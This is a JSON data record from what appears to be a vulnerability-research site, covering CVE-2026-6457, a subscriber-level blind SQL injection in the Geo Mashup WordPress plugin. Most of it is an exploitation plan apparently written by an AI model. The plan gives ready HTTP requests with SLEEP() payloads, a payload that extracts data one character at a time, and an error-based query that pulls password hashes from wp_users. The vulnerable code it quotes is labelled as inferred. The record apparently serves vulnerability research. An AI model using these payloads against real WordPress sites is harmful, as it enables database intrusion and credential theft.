[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fLld5kcZCUjmJQsid8RkkgG128c84Sb5oa1BWUBTNDe8":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":28,"research_verified":29,"research_rounds_completed":30,"research_plan":31,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":32,"research_started_at":33,"research_completed_at":34,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":29,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":29,"source_links":35},"CVE-2026-6457","geo-mashup-authenticated-subscriber-sql-injection-via-geomashupnullfields-parameter","Geo Mashup \u003C= 1.13.19 - Authenticated (Subscriber+) SQL Injection via 'geo_mashup_null_fields' Parameter","The Geo Mashup plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'geo_mashup_null_fields' parameter in all versions up to, and including, 1.13.19 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","geo-mashup",null,"\u003C=1.13.19","1.13.20","medium",6.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-05-01 19:15:56","2026-05-02 07:46:41",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F96a80b89-94e0-4bbd-88cf-5eb5349c320b?source=api-prod",1,[22,23,24,25,26,27],"geo-mashup-db.php","geo-mashup.php","php\u002FAdmin\u002FSettings\u002FOptionsPage.php","php\u002FAdmin\u002FSettings\u002FTabsData.php","readme.txt","vendor\u002Fcomposer\u002Finstalled.php","researched",false,3,"# Exploitation Research Plan - CVE-2026-6457\n\n## 1. Vulnerability Summary\n**CVE-2026-6457** is a time-based blind SQL injection vulnerability in the **Geo Mashup** plugin for WordPress (versions \u003C= 1.13.19). The vulnerability exists in the handling of the `geo_mashup_null_fields` parameter within the `geo_query` AJAX action. The plugin fails to sanitize or properly prepare SQL queries when this parameter is provided, allowing an authenticated attacker (Subscriber or higher) to inject arbitrary SQL commands. Because the results are not directly returned (blind), a time-based approach (e.g., `SLEEP()`) is required for data extraction.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action:** `geo_mashup_query`\n- **Vulnerable Parameter:** `geo_mashup_null_fields`\n- **Authentication:** Required (Subscriber+). Although the action is registered via `wp_ajax_nopriv_geo_mashup_query`, the vulnerability details specify \"Authenticated (Subscriber+)\", suggesting that in typical configurations or specific code paths, a user session is expected.\n- **Payload Type:** Time-based blind SQLi.\n\n## 3. Code Flow\n1. **Entry Point:** The plugin registers AJAX handlers in `geo-mashup.php`:\n   ```php\n   add_action( 'wp_ajax_geo_mashup_query', array( __CLASS__, 'geo_query') );\n   add_action( 'wp_ajax_nopriv_geo_mashup_query', array( __CLASS__, 'geo_query') );\n   ```\n2. **Dispatch:** `GeoMashup::geo_query()` is called. This function typically parses query arguments from `$_REQUEST` and passes them to the database layer.\n3. **Sink:** In `geo-mashup-db.php`, the class `GeoMashupDB` processes these arguments. Specifically, the `geo_mashup_null_fields` parameter is used to dynamically build the `WHERE` clause of a query against the locations table (usually `{$wpdb->prefix}geo_mashup_locations`).\n4. **Vulnerable Logic (Inferred):**\n   ```php\n   if ( ! empty( $_REQUEST['geo_mashup_null_fields'] ) ) {\n       $null_fields = explode( ',', $_REQUEST['geo_mashup_null_fields'] );\n       foreach ( $null_fields as $field ) {\n           \u002F\u002F The field name is interpolated directly into the SQL string without escaping\n           $where .= \" AND $field IS NULL\"; \n       }\n   }\n   ```\n5. **Execution:** The malformed SQL is executed via `$wpdb->get_results()`.\n\n## 4. Nonce Acquisition Strategy\nThe `geo_mashup_query` action generally does **not** require a nonce for marker fetching, as it is designed to be public-facing. However, if the environment enforces a check, Geo Mashup localizes its data in the `GeoMashup` JS object.\n\n**Strategy:**\n1. Create a page with the `[geo_mashup_map]` shortcode to ensure scripts are loaded.\n2. Navigate to the page using `browser_navigate`.\n3. Check for localized variables using `browser_eval`.\n4. **Target Variable:** `window.GeoMashup?.ajax_url` or `window.geo_mashup_options?.ajax_nonce` (if present).\n5. If no nonce is found and `admin-ajax.php` returns `-1` (nonce failure), audit `GeoMashup::geo_query()` for the exact `check_ajax_referer` call.\n\n## 5. Exploitation Strategy\nThe goal is to demonstrate a noticeable time delay using `SLEEP()`.\n\n**Step 1: Authenticate**\n- Log in as a Subscriber user to obtain a session cookie.\n\n**Step 2: Baseline Request**\n- Send a standard request to ensure the endpoint is active.\n- **URL:** `POST \u002Fwp-admin\u002Fadmin-ajax.php`\n- **Body:** `action=geo_mashup_query&geo_mashup_null_fields=id`\n\n**Step 3: Trigger Time Delay**\n- Inject a payload that breaks out of the `IS NULL` context.\n- **Payload Component:** `id) AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -`\n- **Full Parameter:** `geo_mashup_null_fields=id) AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -`\n- **Request:**\n  ```http\n  POST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\n  Content-Type: application\u002Fx-www-form-urlencoded\n\n  action=geo_mashup_query&geo_mashup_null_fields=id)+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))a)--+-\n  ```\n\n**Step 4: Data Extraction (Proof of Concept)**\n- Check if the first character of the database version starts with '5' or '8':\n- **Payload:** `id) AND (SELECT 1 FROM (SELECT(IF(SUBSTRING(VERSION(),1,1)='8',SLEEP(5),0)))a)-- -`\n\n## 6. Test Data Setup\n1. **User:** Create a user with the `subscriber` role.\n2. **Plugin Config:** Ensure the plugin is activated.\n3. **Content:** Create at least one post with a location so the query returns results, though the injection should work regardless if the `WHERE` clause is reached.\n4. **Shortcode Page:**\n   ```bash\n   wp post create --post_type=page --post_title=\"Map Page\" --post_status=publish --post_content='[geo_mashup_map]'\n   ```\n\n## 7. Expected Results\n- **Baseline Request:** Response time \u003C 500ms.\n- **Exploit Request:** Response time > 5000ms.\n- **Response Body:** Likely a JSON object containing location markers or an empty set `[]`, but the HTTP timing is the primary indicator.\n\n## 8. Verification Steps\nAfter the exploit, verify the database structure to confirm the target table and columns:\n```bash\nwp db query \"DESCRIBE wp_geo_mashup_locations;\"\n```\nConfirm the `geo_mashup_query` action's existence in the source:\n```bash\ngrep -r \"wp_ajax_geo_mashup_query\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fgeo-mashup\u002F\n```\n\n## 9. Alternative Approaches\n- **Error-Based:** If `WP_DEBUG` is on, try injecting `AND updatexml(1,concat(0x7e,(SELECT user_pass FROM wp_users LIMIT 1)),1)` to see if the error is reflected in the AJAX response.\n- **Different Injection Point:** If `geo_mashup_null_fields` fails, check if other parameters like `object_name` or `map_name` are similarly interpolated in the `GeoMashupDB::get_object_locations` logic.\n- **Boolean-Based:** Instead of `SLEEP()`, use `AND (SELECT 1)=1` vs `AND (SELECT 1)=2` and observe differences in the number of returned markers in the JSON response.","gemini-3-flash-preview","2026-05-04 17:12:14","2026-05-04 17:12:36",{"type":36,"vulnerable_version":37,"fixed_version":11,"vulnerable_browse":38,"vulnerable_zip":39,"fixed_browse":40,"fixed_zip":41,"all_tags":42},"plugin","1.13.19","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fgeo-mashup\u002Ftags\u002F1.13.19","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fgeo-mashup.1.13.19.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fgeo-mashup\u002Ftags\u002F1.13.20","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fgeo-mashup.1.13.20.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fgeo-mashup\u002Ftags"]